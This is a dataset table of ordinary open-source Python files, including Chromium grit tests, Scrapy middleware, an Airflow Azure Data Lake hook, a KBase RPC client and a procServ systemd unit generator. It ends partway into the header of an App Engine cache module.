| repo_name | path | copies | size | content | license |
|---|---|---|---|---|---|
junhuac/MQUIC | src/tools/grit/grit/tool/transl2tc_unittest.py | 61 | 4893 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''Unit tests for the 'grit transl2tc' tool.'''
import os
import sys
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(__file__), '../..'))
import StringIO
import unittest
from grit.tool import transl2tc
from grit import grd_reader
from grit import util
def MakeOptions():
  """Build a fresh default grit_runner.Options object for tool setup."""
  from grit import grit_runner
  options = grit_runner.Options()
  return options
class TranslationToTcUnittest(unittest.TestCase):
  """Unit tests for the TranslationToTc tool ('grit transl2tc')."""

  def testOutput(self):
    # WriteTranslations must emit one "id text" line per translation, with
    # embedded newlines in the translated text preserved as separate lines.
    buf = StringIO.StringIO()
    tool = transl2tc.TranslationToTc()
    translations = [
      ['1', 'Hello USERNAME, how are you?'],
      ['12', 'Howdie doodie!'],
      ['123', 'Hello\n\nthere\n\nhow are you?'],
      ['1234', 'Hello is > goodbye but < howdie pardner'],
    ]
    tool.WriteTranslations(buf, translations)
    output = buf.getvalue()
    self.failUnless(output.strip() == '''
1 Hello USERNAME, how are you?
12 Howdie doodie!
123 Hello
there
how are you?
1234 Hello is > goodbye but < howdie pardner
'''.strip())

  def testExtractTranslations(self):
    # Build an in-memory .grd whose messages exercise every extraction code
    # path: simple, placeholder, reordered placeholders, changed text,
    # duplicates ("twins"), untranslateable, and RC structures.
    path = util.PathFromRoot('grit/testdata')
    current_grd = grd_reader.Parse(StringIO.StringIO('''<?xml version="1.0" encoding="UTF-8"?>
<grit latest_public_release="2" source_lang_id="en-US" current_release="3" base_dir=".">
<release seq="3">
<messages>
<message name="IDS_SIMPLE">
One
</message>
<message name="IDS_PLACEHOLDER">
<ph name="NUMBIRDS">%s<ex>3</ex></ph> birds
</message>
<message name="IDS_PLACEHOLDERS">
<ph name="ITEM">%d<ex>1</ex></ph> of <ph name="COUNT">%d<ex>3</ex></ph>
</message>
<message name="IDS_REORDERED_PLACEHOLDERS">
<ph name="ITEM">$1<ex>1</ex></ph> of <ph name="COUNT">$2<ex>3</ex></ph>
</message>
<message name="IDS_CHANGED">
This is the new version
</message>
<message name="IDS_TWIN_1">Hello</message>
<message name="IDS_TWIN_2">Hello</message>
<message name="IDS_NOT_TRANSLATEABLE" translateable="false">:</message>
<message name="IDS_LONGER_TRANSLATED">
Removed document <ph name="FILENAME">$1<ex>c:\temp</ex></ph>
</message>
<message name="IDS_DIFFERENT_TWIN_1">Howdie</message>
<message name="IDS_DIFFERENT_TWIN_2">Howdie</message>
</messages>
<structures>
<structure type="dialog" name="IDD_ABOUTBOX" encoding="utf-16" file="klonk.rc" />
<structure type="menu" name="IDC_KLONKMENU" encoding="utf-16" file="klonk.rc" />
</structures>
</release>
</grit>'''), path)
    current_grd.SetOutputLanguage('en')
    current_grd.RunGatherers()

    # Source and translated RC files come from the shared grit testdata.
    source_rc_path = util.PathFromRoot('grit/testdata/source.rc')
    source_rc = util.ReadFile(source_rc_path, util.RAW_TEXT)
    transl_rc_path = util.PathFromRoot('grit/testdata/transl.rc')
    transl_rc = util.ReadFile(transl_rc_path, util.RAW_TEXT)

    tool = transl2tc.TranslationToTc()
    output_buf = StringIO.StringIO()
    globopts = MakeOptions()
    globopts.verbose = True
    globopts.output_stream = output_buf
    tool.Setup(globopts, [])
    translations = tool.ExtractTranslations(current_grd,
                                            source_rc, source_rc_path,
                                            transl_rc, transl_rc_path)
    values = translations.values()
    output = output_buf.getvalue()

    # Translations that must be extracted.
    self.failUnless('Ein' in values)
    self.failUnless('NUMBIRDS Vogeln' in values)
    self.failUnless('ITEM von COUNT' in values)
    # Twin messages share one clique, so 'Hallo' appears exactly once.
    self.failUnless(values.count('Hallo') == 1)
    # Translations that must be rejected (changed, untranslateable, stale).
    self.failIf('Dass war die alte Version' in values)
    self.failIf(':' in values)
    self.failIf('Dokument FILENAME ist entfernt worden' in values)
    self.failIf('Nicht verwendet' in values)
    # Exactly one of the two conflicting 'Howdie' translations is kept.
    self.failUnless(('Howdie' in values or 'Hallo sagt man' in values) and not
                    ('Howdie' in values and 'Hallo sagt man' in values))

    # Structure translations are extracted with placeholder markers.
    self.failUnless('XX01XX&SkraXX02XX&HaettaXX03XXThetta er "Klonk" sem eg fylaXX04XXgonkurinnXX05XXKlonk && er [good]XX06XX&HjalpXX07XX&Um...XX08XX' in values)
    self.failUnless('I lagi' in values)

    # Verbose output must report each mismatch that was skipped.
    self.failUnless(output.count('Structure of message IDS_REORDERED_PLACEHOLDERS has changed'))
    self.failUnless(output.count('Message IDS_CHANGED has changed'))
    self.failUnless(output.count('Structure of message IDS_LONGER_TRANSLATED has changed'))
    self.failUnless(output.count('Two different translations for "Howdie"'))
    self.failUnless(output.count('IDD_DIFFERENT_LENGTH_IN_TRANSL has wrong # of cliques'))
# Allow running this test suite directly.
if __name__ == '__main__':
  unittest.main()
| mit |
darcyfdu/findlicense | src/packagedcode/utils.py | 5 | 3753 | #
# Copyright (c) 2015 nexB Inc. and others. All rights reserved.
# http://nexb.com and https://github.com/nexB/scancode-toolkit/
# The ScanCode software is licensed under the Apache License version 2.0.
# Data generated with ScanCode require an acknowledgment.
# ScanCode is a trademark of nexB Inc.
#
# You may not use this software except in compliance with the License.
# You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# When you publish or redistribute any data created with ScanCode or any ScanCode
# derivative work, you must accompany this data with the following acknowledgment:
#
# Generated with ScanCode and provided on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, either express or implied. No content created from
# ScanCode should be considered or used as legal advice. Consult an Attorney
# for any legal advice.
# ScanCode is a free software code scanning tool from nexB Inc. and others.
# Visit https://github.com/nexB/scancode-toolkit/ for support and download.
from __future__ import print_function, absolute_import
# URL prefixes that mark a repo URL as an already-explicit VCS URL:
# such URLs are returned unchanged by parse_repo_url().
VCS_URLS = (
    'https://',
    'http://',
    'git://',
    'git+git://',
    'hg+https://',
    'hg+http://',
    'git+https://',
    'git+http://',
    'svn+https://',
    'svn+http://',
    'svn://',
)


def parse_repo_url(repo_url):
    """
    Validate a repo_url and handle shortcuts for GitHub, GitHub gist,
    Bitbucket, or GitLab repositories (same syntax as npm install):
    See https://docs.npmjs.com/files/package.json#repository
    or https://getcomposer.org/doc/05-repositories.md
    This is done here in npm:
    https://github.com/npm/npm/blob/d3c858ce4cfb3aee515bb299eb034fe1b5e44344/node_modules/hosted-git-info/git-host-info.js
    These should be resolved:
        npm/npm
        gist:11081aaa281
        bitbucket:example/repo
        gitlab:another/repo
        expressjs/serve-static
        git://github.com/angular/di.js.git
        git://github.com/hapijs/boom
        git@github.com:balderdashy/waterline-criteria.git
        http://github.com/ariya/esprima.git
        http://github.com/isaacs/nopt
        https://github.com/chaijs/chai
        https://github.com/christkv/kerberos.git
        https://gitlab.com/foo/private.git
        git@gitlab.com:foo/private.git

    Returns the input unchanged when it is already an explicit VCS URL or
    does not match any known shortcut.
    """
    if repo_url.startswith(VCS_URLS):
        # TODO: If we match http and https, we may should add more check in
        # case the url is not a repo one. For example, check the domain name.
        return repo_url

    if repo_url.startswith('git@'):
        # ssh-style shortcut: git@<host>:<owner>/<repo>
        _user, remainder = repo_url.split('@', 1)
        host, repo = remainder.split(':', 1)
        if any(h in host for h in ('github', 'bitbucket', 'gitlab')):
            return 'https://{0}/{1}'.format(host, repo)
        return repo_url

    if repo_url.startswith(('bitbucket:', 'gitlab:', 'github:', 'gist:')):
        # hoster shortcuts, e.g. "bitbucket:example/repo"
        hoster_urls = {
            'bitbucket': 'https://bitbucket.org/{0}',
            'github': 'https://github.com/{0}',
            'gitlab': 'https://gitlab.com/{0}',
            'gist': 'https://gist.github.com/{0}',
        }
        hoster, repo = repo_url.split(':', 1)
        return hoster_urls[hoster].format(repo)

    if len(repo_url.split('/')) == 2:
        # implicit github shortcut: "<owner>/<repo>"
        return 'https://github.com/{0}'.format(repo_url)

    return repo_url
| apache-2.0 |
dekked/dynamodb-mock | tests/functional/boto/test_list_tables.py | 3 | 1039 | # -*- coding: utf-8 -*-
import unittest
import boto
# Table names used by the mock-database fixtures below.
TABLE_NAME1 = 'Table-1'
TABLE_NAME2 = 'Table-2'
class TestListTables(unittest.TestCase):
    """Functional test for ListTables against the ddbmock boto patch."""

    def setUp(self):
        # Imports stay local: ddbmock patches boto lazily and the tests
        # must control exactly when that happens.
        from ddbmock.database.db import dynamodb
        from ddbmock.database.table import Table
        from ddbmock.database.key import PrimaryKey

        dynamodb.hard_reset()
        hash_key = PrimaryKey('hash_key', 'N')
        range_key = PrimaryKey('range_key', 'S')
        t1 = Table(TABLE_NAME1, 10, 10, hash_key, range_key)
        t2 = Table(TABLE_NAME2, 10, 10, hash_key, range_key)
        # Register both tables directly in the mock database's store.
        dynamodb.data[TABLE_NAME1] = t1
        dynamodb.data[TABLE_NAME2] = t2

    def tearDown(self):
        from ddbmock.database.db import dynamodb
        from ddbmock import clean_boto_patch
        # Reset the mock database and undo the boto monkey-patching so
        # other test modules start from a clean slate.
        dynamodb.hard_reset()
        clean_boto_patch()

    def test_list_tables(self):
        from ddbmock import connect_boto_patch
        db = connect_boto_patch()

        expected = [TABLE_NAME1, TABLE_NAME2]
        self.assertEqual(expected, db.list_tables())
| lgpl-3.0 |
psnovichkov/narrative | src/MG-RAST_ipy-mkmq/ipyMKMQ/genopheno.py | 7 | 10215 | ############################################################
#
# Autogenerated by the KBase type compiler -
# any changes made here will be overwritten
#
# Passes on URLError, timeout, and BadStatusLine exceptions.
# See:
# http://docs.python.org/2/library/urllib2.html
# http://docs.python.org/2/library/httplib.html
#
############################################################
try:
import json
except ImportError:
import sys
sys.path.append('simplejson-2.3.3')
import simplejson as json
import urllib2, httplib, urlparse
from urllib2 import URLError, HTTPError
# Shorthand for the HTTP content-type header name and the JSON media type.
_CT = 'content-type'
_AJ = 'application/json'
# Only plain http/https endpoints are accepted for the service URL.
_URL_SCHEME = frozenset(['http', 'https'])
class ServerError(Exception):
    """Error reported by the JSON-RPC server.

    Mirrors the JSON-RPC error object: a name, a numeric code, and a
    human-readable message.
    """

    def __init__(self, name, code, message):
        self.name = name
        self.code = code
        self.message = message

    def __str__(self):
        return '{0}: {1}. {2}'.format(self.name, self.code, self.message)
class Genotype_PhenotypeAPI:
    """JSON-RPC 1.1 client for the KBase Genotype_PhenotypeAPI service.

    Autogenerated client, refactored so all service methods share a single
    request helper (_call) instead of repeating ~25 lines of HTTP/JSON-RPC
    plumbing per method.  Passes on URLError, timeout, and BadStatusLine
    exceptions (see module header).
    """

    def __init__(self, url, timeout = 30 * 60):
        """Create a client for the service at *url*.

        :param url: http(s) endpoint of the service.
        :param timeout: request timeout in seconds (default 30 minutes).
        :raises ValueError: if url is missing/invalid or timeout < 1.
        """
        if url is None:
            raise ValueError('A url is required')
        scheme, _, _, _, _, _ = urlparse.urlparse(url)
        if scheme not in _URL_SCHEME:
            raise ValueError(url + " isn't a valid http url")
        self.url = url
        self.timeout = int(timeout)
        if self.timeout < 1:
            raise ValueError('Timeout value must be at least 1 second')

    def _call(self, method, params):
        """POST one JSON-RPC 1.1 request and return the first result element.

        :param method: fully-qualified service method name.
        :param params: list of positional parameters for the call.
        :raises ServerError: when the server reports a JSON-RPC error.
        :raises HTTPError/URLError: for transport-level failures.
        """
        arg_hash = { 'method': method,
                     'params': params,
                     'version': '1.1'
                     }
        body = json.dumps(arg_hash)
        try:
            ret = urllib2.urlopen(self.url, body, timeout = self.timeout)
        except HTTPError as h:
            if _CT in h.headers and h.headers[_CT] == _AJ:
                err = json.loads(h.read())
                if 'error' in err:
                    raise ServerError(**err['error'])
                else: #this should never happen... if it does
                    raise h # h.read() will return '' in the calling code.
            else:
                raise h
        if ret.code != httplib.OK:
            # BUGFIX: ret.code is an int; the original concatenated it to a
            # str directly, which would raise TypeError instead of URLError.
            raise URLError('Received bad response code from server:' +
                           str(ret.code))
        resp = json.loads(ret.read())
        if 'result' in resp:
            return resp['result'][0]
        else:
            raise ServerError('Unknown', 0, 'An unknown server error occurred')

    def get_experiments(self, kb_genome):
        return self._call('Genotype_PhenotypeAPI.get_experiments',
                          [kb_genome])

    def get_traits(self, kb_study_experiment):
        return self._call('Genotype_PhenotypeAPI.get_traits',
                          [kb_study_experiment])

    def traits_to_variations(self, trait, pvaluecutoff):
        return self._call('Genotype_PhenotypeAPI.traits_to_variations',
                          [trait, pvaluecutoff])

    def chromosome_position_from_variation_details(self, variation_details):
        return self._call(
            'Genotype_PhenotypeAPI.chromosome_position_from_variation_details',
            [variation_details])

    def traits_to_genes(self, trait, pvaluecutoff, distance):
        return self._call('Genotype_PhenotypeAPI.traits_to_genes',
                          [trait, pvaluecutoff, distance])

    def variations_to_genes(self, chromosomal_positions, distance):
        return self._call('Genotype_PhenotypeAPI.variations_to_genes',
                          [chromosomal_positions, distance])

    def find_common_snps(self, trait_list_pvalue):
        return self._call('Genotype_PhenotypeAPI.find_common_snps',
                          [trait_list_pvalue])

    def selected_locations_to_genes(self, trait, pmin, pmax, chromosomal_locations, distance):
        return self._call('Genotype_PhenotypeAPI.selected_locations_to_genes',
                          [trait, pmin, pmax, chromosomal_locations, distance])
| mit |
harshaneelhg/scikit-learn | examples/cluster/plot_digits_linkage.py | 369 | 2959 | """
=============================================================================
Various Agglomerative Clustering on a 2D embedding of digits
=============================================================================
An illustration of various linkage option for agglomerative clustering on
a 2D embedding of the digits dataset.
The goal of this example is to show intuitively how the metrics behave, and
not to find good clusters for the digits. This is why the example works on a
2D embedding.
What this example shows us is the behavior "rich getting richer" of
agglomerative clustering that tends to create uneven cluster sizes.
This behavior is especially pronounced for the average linkage strategy,
that ends up with a couple of singleton clusters.
"""
# Authors: Gael Varoquaux
# License: BSD 3 clause (C) INRIA 2014
print(__doc__)
from time import time
import numpy as np
from scipy import ndimage
from matplotlib import pyplot as plt
from sklearn import manifold, datasets
digits = datasets.load_digits(n_class=10)
X = digits.data
y = digits.target
n_samples, n_features = X.shape
np.random.seed(0)
def nudge_images(X, y):
    """Double the dataset by appending a randomly shifted copy of each image.

    Having a larger dataset shows the clustering behavior more clearly, but
    we only multiply its size by 2 because the hierarchical clustering
    methods are strongly super-linear in n_samples.
    """
    def _shift(flat_img):
        # Each 8x8 image is translated by a small random offset and
        # flattened back; pixels shifted in from outside are zero.
        return ndimage.shift(flat_img.reshape((8, 8)),
                             .3 * np.random.normal(size=2),
                             mode='constant',
                             ).ravel()

    shifted = np.apply_along_axis(_shift, 1, X)
    X_out = np.concatenate([X, shifted])
    y_out = np.concatenate([y, y], axis=0)
    return X_out, y_out
X, y = nudge_images(X, y)
#----------------------------------------------------------------------
# Visualize the clustering
def plot_clustering(X_red, X, labels, title=None):
    """Plot the 2D embedding, drawing each sample as its digit glyph.

    :param X_red: 2D embedding of the data, shape (n_samples, 2).
    :param X: original data (present in the signature but not used below).
    :param labels: cluster assignment per sample; encoded as text color.
    :param title: optional figure title.

    NOTE(review): the glyph text uses the module-level ``y`` (true digit
    labels), not ``labels`` -- apparently intentional so color shows the
    clustering while the glyph shows ground truth; confirm.
    """
    # Rescale the embedding to the unit square so text positions are stable.
    x_min, x_max = np.min(X_red, axis=0), np.max(X_red, axis=0)
    X_red = (X_red - x_min) / (x_max - x_min)

    plt.figure(figsize=(6, 4))
    for i in range(X_red.shape[0]):
        plt.text(X_red[i, 0], X_red[i, 1], str(y[i]),
                 color=plt.cm.spectral(labels[i] / 10.),
                 fontdict={'weight': 'bold', 'size': 9})

    plt.xticks([])
    plt.yticks([])
    if title is not None:
        plt.title(title, size=17)
    plt.axis('off')
    plt.tight_layout()
#----------------------------------------------------------------------
# 2D embedding of the digits dataset
print("Computing embedding")
# Reduce the 64-dimensional digit images to 2-D before clustering.
X_red = manifold.SpectralEmbedding(n_components=2).fit_transform(X)
print("Done.")

from sklearn.cluster import AgglomerativeClustering

# Cluster the embedded data with each linkage strategy and plot the result.
for linkage in ('ward', 'average', 'complete'):
    clustering = AgglomerativeClustering(linkage=linkage, n_clusters=10)
    t0 = time()
    clustering.fit(X_red)
    print("%s : %.2fs" % (linkage, time() - t0))

    plot_clustering(X_red, X, clustering.labels_, "%s linkage" % linkage)

plt.show()
| bsd-3-clause |
yidongliu/scrapy | scrapy/downloadermiddlewares/decompression.py | 151 | 2629 | """ This module implements the DecompressionMiddleware which tries to recognise
and extract the potentially compressed responses that may arrive.
"""
import bz2
import gzip
import zipfile
import tarfile
import logging
from tempfile import mktemp
import six
try:
from cStringIO import StringIO as BytesIO
except ImportError:
from io import BytesIO
from scrapy.responsetypes import responsetypes
logger = logging.getLogger(__name__)
class DecompressionMiddleware(object):
    """ This middleware tries to recognise and extract the possibly compressed
    responses that may arrive. """

    def __init__(self):
        # Detection probes, keyed by the format name used in the debug log.
        self._formats = {
            'tar': self._is_tar,
            'zip': self._is_zip,
            'gz': self._is_gzip,
            'bz2': self._is_bzip2
        }

    def _is_tar(self, response):
        raw = BytesIO(response.body)
        try:
            tar_file = tarfile.open(name=mktemp(), fileobj=raw)
        except tarfile.ReadError:
            return
        first_member = tar_file.members[0]
        body = tar_file.extractfile(first_member).read()
        respcls = responsetypes.from_args(filename=first_member.name, body=body)
        return response.replace(body=body, cls=respcls)

    def _is_zip(self, response):
        raw = BytesIO(response.body)
        try:
            zip_file = zipfile.ZipFile(raw)
        except zipfile.BadZipfile:
            return
        first_name = zip_file.namelist()[0]
        body = zip_file.read(first_name)
        respcls = responsetypes.from_args(filename=first_name, body=body)
        return response.replace(body=body, cls=respcls)

    def _is_gzip(self, response):
        try:
            body = gzip.GzipFile(fileobj=BytesIO(response.body)).read()
        except IOError:
            return
        respcls = responsetypes.from_args(body=body)
        return response.replace(body=body, cls=respcls)

    def _is_bzip2(self, response):
        try:
            body = bz2.decompress(response.body)
        except IOError:
            return
        respcls = responsetypes.from_args(body=body)
        return response.replace(body=body, cls=respcls)

    def process_response(self, request, response, spider):
        # Nothing to sniff in an empty body.
        if not response.body:
            return response

        for fmt, func in six.iteritems(self._formats):
            decompressed = func(response)
            if decompressed:
                logger.debug('Decompressed response with format: %(responsefmt)s',
                             {'responsefmt': fmt}, extra={'spider': spider})
                return decompressed
        return response
| bsd-3-clause |
subodhchhabra/airflow | airflow/contrib/hooks/azure_data_lake_hook.py | 11 | 6396 | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from airflow.hooks.base_hook import BaseHook
from azure.datalake.store import core, lib, multithread
class AzureDataLakeHook(BaseHook):
    """
    Interacts with Azure Data Lake.

    Client ID and client secret should be in user and password parameters.
    Tenant and account name should be extra field as
    {"tenant": "<TENANT>", "account_name": "ACCOUNT_NAME"}.

    :param azure_data_lake_conn_id: Reference to the Azure Data Lake connection.
    :type azure_data_lake_conn_id: str
    """

    def __init__(self, azure_data_lake_conn_id='azure_data_lake_default'):
        self.conn_id = azure_data_lake_conn_id
        # Connect eagerly; get_conn() also records self.account_name.
        self.connection = self.get_conn()

    def get_conn(self):
        """Return a AzureDLFileSystem object."""
        conn = self.get_connection(self.conn_id)
        service_options = conn.extra_dejson
        # Side effect: remember the account name for later use.
        self.account_name = service_options.get('account_name')
        # Service-principal auth: client id/secret are stored in the
        # connection's login/password fields.
        adlCreds = lib.auth(tenant_id=service_options.get('tenant'),
                            client_secret=conn.password,
                            client_id=conn.login)
        adlsFileSystemClient = core.AzureDLFileSystem(adlCreds,
                                                      store_name=self.account_name)
        adlsFileSystemClient.connect()
        return adlsFileSystemClient

    def check_for_file(self, file_path):
        """
        Check if a file exists on Azure Data Lake.

        :param file_path: Path and name of the file.
        :type file_path: str
        :return: True if the file exists, False otherwise.
        :rtype bool
        """
        try:
            # glob() so wildcard paths work too; exactly one match counts
            # as "the file exists".
            files = self.connection.glob(file_path, details=False, invalidate_cache=True)
            return len(files) == 1
        except FileNotFoundError:
            return False

    def upload_file(self, local_path, remote_path, nthreads=64, overwrite=True,
                    buffersize=4194304, blocksize=4194304):
        """
        Upload a file to Azure Data Lake.

        :param local_path: local path. Can be single file, directory (in which case,
            upload recursively) or glob pattern. Recursive glob patterns using `**`
            are not supported.
        :type local_path: str
        :param remote_path: Remote path to upload to; if multiple files, this is the
            directory root to write within.
        :type remote_path: str
        :param nthreads: Number of threads to use. If None, uses the number of cores.
        :type nthreads: int
        :param overwrite: Whether to forcibly overwrite existing files/directories.
            If False and remote path is a directory, will quit regardless if any files
            would be overwritten or not. If True, only matching filenames are actually
            overwritten.
        :type overwrite: bool
        :param buffersize: int [2**22]
            Number of bytes for internal buffer. This block cannot be bigger than
            a chunk and cannot be smaller than a block.
        :type buffersize: int
        :param blocksize: int [2**22]
            Number of bytes for a block. Within each chunk, we write a smaller
            block for each API call. This block cannot be bigger than a chunk.
        :type blocksize: int
        """
        multithread.ADLUploader(self.connection,
                                lpath=local_path,
                                rpath=remote_path,
                                nthreads=nthreads,
                                overwrite=overwrite,
                                buffersize=buffersize,
                                blocksize=blocksize)

    def download_file(self, local_path, remote_path, nthreads=64, overwrite=True,
                      buffersize=4194304, blocksize=4194304):
        """
        Download a file from Azure Data Lake.

        :param local_path: local path. If downloading a single file, will write to this
            specific file, unless it is an existing directory, in which case a file is
            created within it. If downloading multiple files, this is the root
            directory to write within. Will create directories as required.
        :type local_path: str
        :param remote_path: remote path/globstring to use to find remote files.
            Recursive glob patterns using `**` are not supported.
        :type remote_path: str
        :param nthreads: Number of threads to use. If None, uses the number of cores.
        :type nthreads: int
        :param overwrite: Whether to forcibly overwrite existing files/directories.
            If False and remote path is a directory, will quit regardless if any files
            would be overwritten or not. If True, only matching filenames are actually
            overwritten.
        :type overwrite: bool
        :param buffersize: int [2**22]
            Number of bytes for internal buffer. This block cannot be bigger than
            a chunk and cannot be smaller than a block.
        :type buffersize: int
        :param blocksize: int [2**22]
            Number of bytes for a block. Within each chunk, we write a smaller
            block for each API call. This block cannot be bigger than a chunk.
        :type blocksize: int
        """
        multithread.ADLDownloader(self.connection,
                                  lpath=local_path,
                                  rpath=remote_path,
                                  nthreads=nthreads,
                                  overwrite=overwrite,
                                  buffersize=buffersize,
                                  blocksize=blocksize)
| apache-2.0 |
tsheasha/fullerite | src/diamond/collectors/powerdns/test/testpowerdns.py | 35 | 2834 | #!/usr/bin/python
# coding=utf-8
################################################################################
from test import CollectorTestCase
from test import get_collector_config
from test import unittest
from mock import Mock
from mock import patch
from diamond.collector import Collector
from powerdns import PowerDNSCollector
################################################################################
class TestPowerDNSCollector(CollectorTestCase):
    """Tests for PowerDNSCollector using canned pdns_control output fixtures."""

    def setUp(self):
        # 'bin': 'true' points the collector at a no-op binary; the real
        # pdns_control output is injected by patching Popen.communicate.
        config = get_collector_config('PowerDNSCollector', {
            'interval': 1,
            'bin': 'true',
            'use_sudo': False,
        })
        self.collector = PowerDNSCollector(config, None)

    def test_import(self):
        self.assertTrue(PowerDNSCollector)

    @patch('os.access', Mock(return_value=True))
    @patch.object(Collector, 'publish')
    def test_should_work_with_fake_data(self, publish_mock):
        # First collection (fixture A) only primes the collector's internal
        # counters, so nothing should be published yet.
        patch_communicate = patch(
            'subprocess.Popen.communicate',
            Mock(return_value=(
                self.getFixture(
                    'pdns_control-2.9.22.6-1.el6-A'
                ).getvalue(),
                '')))
        patch_communicate.start()
        self.collector.collect()
        patch_communicate.stop()

        self.assertPublishedMany(publish_mock, {})

        # Second collection (fixture B) yields the deltas below.
        patch_communicate = patch(
            'subprocess.Popen.communicate',
            Mock(return_value=(
                self.getFixture('pdns_control-2.9.22.6-1.el6-B').getvalue(),
                '')))
        patch_communicate.start()
        self.collector.collect()
        patch_communicate.stop()

        # Expected metric values are the per-interval differences between
        # fixture B and fixture A counter values.
        metrics = {
            'corrupt-packets': 1.0,
            'deferred-cache-inserts': 2.0,
            'deferred-cache-lookup': 3.0,
            'latency': 4.0,
            'packetcache-hit': 5.0,
            'packetcache-miss': 6.0,
            'packetcache-size': 7.0,
            'qsize-q': 8.0,
            'query-cache-hit': 9.0,
            'query-cache-miss': 10.0,
            'recursing-answers': 11.0,
            'recursing-questions': 12.0,
            'servfail-packets': 13.0,
            'tcp-answers': 14.0,
            'tcp-queries': 15.0,
            'timedout-packets': 16.0,
            'udp-answers': 17.0,
            'udp-queries': 18.0,
            'udp4-answers': 19.0,
            'udp4-queries': 20.0,
            'udp6-answers': 21.0,
            'udp6-queries': 22.0,
        }

        self.setDocExample(collector=self.collector.__class__.__name__,
                           metrics=metrics,
                           defaultpath=self.collector.config['path'])
        self.assertPublishedMany(publish_mock, metrics)
################################################################################
# Allow running this test suite directly.
if __name__ == "__main__":
    unittest.main()
| apache-2.0 |
ralphlange/procServ | procServUtils/generator.py | 1 | 1903 |
import logging
_log = logging.getLogger(__name__)
import sys, os, errno
from .conf import getconf
def which(file):
    """Return the first PATH entry that contains *file*, or None.

    Note: unlike shutil.which(), this only checks for existence, not
    for the executable bit.
    """
    for directory in os.environ["PATH"].split(os.pathsep):
        candidate = os.path.join(directory, file)
        if os.path.exists(candidate):
            return candidate
    return None
def write_service(F, conf, sect, user=False):
    """Write a systemd unit file for procServ instance *sect* to stream F.

    :param F: writable text stream receiving the unit file contents.
    :param conf: parsed configuration (ConfigParser-like).
    :param sect: config section name == instance name.
    :param user: True to emit a per-user unit, False for a system unit.
    """
    # Interpolation values for the unit-file templates below.
    # NOTE(review): assumes 'user', 'group' and 'chdir' are always present
    # in the section -- presumably defaults are supplied by getconf().
    opts = {
        'name':sect,
        'user':conf.get(sect, 'user'),
        'group':conf.get(sect, 'group'),
        'chdir':conf.get(sect, 'chdir'),
        # launcher flag selecting a per-user or system-wide instance
        'userarg':'--user' if user else '--system',
        'launcher':which('procServ-launcher'),
    }
    F.write("""
[Unit]
Description=procServ for %(name)s
After=network.target remote-fs.target
ConditionPathIsDirectory=%(chdir)s
"""%opts)
    # Only start on the configured host, if one is given.
    if conf.has_option(sect, 'host'):
        F.write('ConditionHost=%s\n'%conf.get(sect, 'host'))
    F.write("""
[Service]
Type=simple
"""%opts)
    # Optional environment configuration for the service.
    if conf.has_option(sect, 'env_file'):
        F.write('EnvironmentFile=%s\n'%conf.get(sect, 'env_file'))
    if conf.has_option(sect, 'environment'):
        F.write('Environment=%s\n'%conf.get(sect, 'environment'))
    F.write("""\
ExecStart=%(launcher)s %(userarg)s %(name)s
RuntimeDirectory=procserv-%(name)s
StandardOutput=syslog
StandardError=inherit
SyslogIdentifier=procserv-%(name)s
"""%opts)
    # User/Group only apply to system units; user units run as the caller.
    if not user:
        F.write("""
User=%(user)s
Group=%(group)s
"""%opts)
    F.write("""
[Install]
WantedBy=multi-user.target
"""%opts)
def run(outdir, user=False):
    """Generate a procserv-<name>.service unit in *outdir* for every
    configured instance section, writing atomically via a .tmp rename."""
    conf = getconf(user=user)
    for name in conf.sections():
        _log.debug('Consider %s', name)
        if not conf.getboolean(name, 'instance'):
            continue
        service = 'procserv-%s.service'%name
        target = os.path.join(outdir, service)
        _log.debug('Write %s', service)
        tmp = target + '.tmp'
        with open(tmp, 'w') as F:
            write_service(F, conf, name, user=user)
        # Atomic replace so a half-written unit is never left in place.
        os.rename(tmp, target)
| gpl-3.0 |
gonboy/sl4a | python-build/python-libs/gdata/samples/oauth/oauth_on_appengine/appengine_utilities/cache.py | 129 | 9763 | # -*- coding: utf-8 -*-
"""
Copyright (c) 2008, appengine-utilities project
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
- Neither the name of the appengine-utilities project nor the names of its
contributors may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
# main python imports
import datetime
import pickle
import random
import __main__
# google appengine import
from google.appengine.ext import db
